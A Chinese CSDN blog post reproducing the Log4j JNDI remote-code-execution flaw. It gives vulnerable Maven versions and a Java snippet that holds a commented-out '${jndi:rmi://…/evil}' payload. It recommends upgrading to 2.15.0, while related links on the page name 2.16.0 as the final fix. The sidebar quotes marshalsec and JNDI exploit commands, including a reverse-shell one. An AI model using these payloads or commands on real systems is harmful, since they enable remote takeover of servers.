Log4j高危漏洞复现及解决方案-----周瑜老师

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量3.1k 收藏
点赞数
分类专栏: mysql Java 文章标签: 安全 java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wyn_365/article/details/121902637
版权
Java 同时被 2 个专栏收录
119 篇文章 4 订阅
订阅专栏
mysql
12 篇文章 0 订阅
订阅专栏

一、Log4j

在这里插入图片描述

二、漏洞复现

2.1 log4j版本

		<dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

2.2 log服务段代码

	private static final Logger LOGGER = LogManager.getLogger();
    public static void main(String[] args) {
        //String username = "${jndi:rmi://192.168.65.31:1099/evil}";
        String username1 = "123456";
        String username2 = "${java:os}"; // 输出操作系统有关信息,lookup的功能
        LOGGER.info("hello,{}!",username2);
    }

在这里插入图片描述

2.3 黑客端代码

在这里插入图片描述
在这里插入图片描述

2.4 执行端代码

是在log服务端代码执行的,bug严重
在这里插入图片描述

三、解决方案

3.1 升级log4j版本

		<dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.15.0</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.15.0</version>
        </dependency>
Coding路人王
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Log4j 史诗级漏洞,京东这样的大厂都中招了
aa119101的博客
06-20 215
昨天晚上一个 Apache Log4j2 的高危漏洞被公开了,这个远程代码执行漏洞堪称史诗级别的漏洞。Apache Log4j2 这个组件有多少公司在用,这个不用我多说吧,实在是太多了。不知道昨晚有多少程序员半夜起床改代码呢?漏洞原理官方表述是:Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。通俗简单的说就是:在打印日志的时候,如果你的日志内容中包含关键词 ${,攻击者就能将关键字所包含的内容当作变量来替
log4j2漏洞终极解决方法 apache-log4j-2.16.0-bin.zip
12-14
《Apache Log4j2漏洞详解及修指南》 在网络安全领域,Apache Log4j2漏洞是一个备受关注的话题,尤其在2021年底,该漏洞的出引发了全球范围内的广泛关注。这个漏洞,被称为CVE-2021-44228,影响了广泛使用的Java...
log4j-api-2.12.4.ja和log4j-core-2.12.4.jar
04-27
log4j-api-2.12.4.jar和log4j-core-2.12.4.jar,该版本避免log4j漏洞问题。
Web网络安全-----Log4j高危漏洞原理及修_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 943
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
Log4j2 RCE漏洞
守拙的博客
12-10 4485
最新log4j rce漏洞
Apache Log4j 高危漏洞
公众号:Java后端
12-11 500
01.概要Apache Log4j2 存在一处远程代码执行漏洞,该漏洞影响范围极广,漏洞危害极大。估计昨天所有的 Java 工程师都在熬夜修改这个漏洞。Apache Log4j2 是一个...
log4j漏洞
Machine的博客
12-20 567
最近出log4j漏洞问题,抱着好奇的心态来重下。 环境搭建及测试代码 本文采用的是SpringBoot 2.2.6版本加一个RMI服务重BUG,方式是通过在微服务工程里打log日志,以触发远程服务调用漏洞。 省略搭建微服务的过程,我使用的是社区版idea 2020.3.4,大家同样使用社区版的话,建议安装Spring assistant插件,可以很方便的搭建Springboot工程。 因为目前已经有了新版本的修,这里建议大家使用Springboot2.2.6.RELEASE版本,其中带的log.
Log4j漏洞
m1287578441的博客
06-08 2934
Log4j漏洞
log4j-slf4j-impl-2.11.2.jar
01-08
log4j-slf4j-impl-2.11.2.jar
完整log4j漏洞
追风筝的摆渡人
12-30 2947
log4j2.X漏洞
Web网络安全-----Log4j高危漏洞原理及修
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
Log4j 2.14.0以下产生的高危漏洞记录与
weixin_44490796的博客
03-09 4181
​ Apache Log4j2是一款优秀的Java日志框架。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞
log4j漏洞原理和靶场
Aiwin的博客
08-19 7814
log4j漏洞原理和靶场
Log4j高危漏洞原理及
热门推荐
qq_51302564的博客
12-15 1万+
Log4j高危漏洞原理及 漏洞检测||环境 查看JDK版本,发版本小于1.8u121 图3-7 查看JDK版本 查看log4j2版本,发版本在2.x <= 2.14.1内 图3-8 查看log4j2版本 查看代码,发存在log4j2相关的lookup语句 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-w9LtKVys-1639577266999)(C:\Users\BLACKF~1\AppData\Local\Temp\ksohtml\wps3AFF.
log4j2远程代码执行漏洞原理与漏洞(基于vulhub,保姆级的详细教程)_log4j漏洞(1)
2401_84281601的博客
05-02 33
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer “http://刚才http服务的地址:端口号/#Exploit” 1389。java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “构造反弹shell的命令的base64编码” -A “攻击机ip”java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 攻击机ip。
Eclipse下B3log-Solo热部署教程:解决Maven结构难题
本文档主要介绍了如何在Eclipse环境下实B3log Solo的热部署方案,针对B3log Solo的特殊Maven目录结构带来的挑战进行了解决。首先,作者强调虽然热部署可能导致开发过程中频繁重启,但在实际开发中为了提高效率,热...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Coding路人王

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值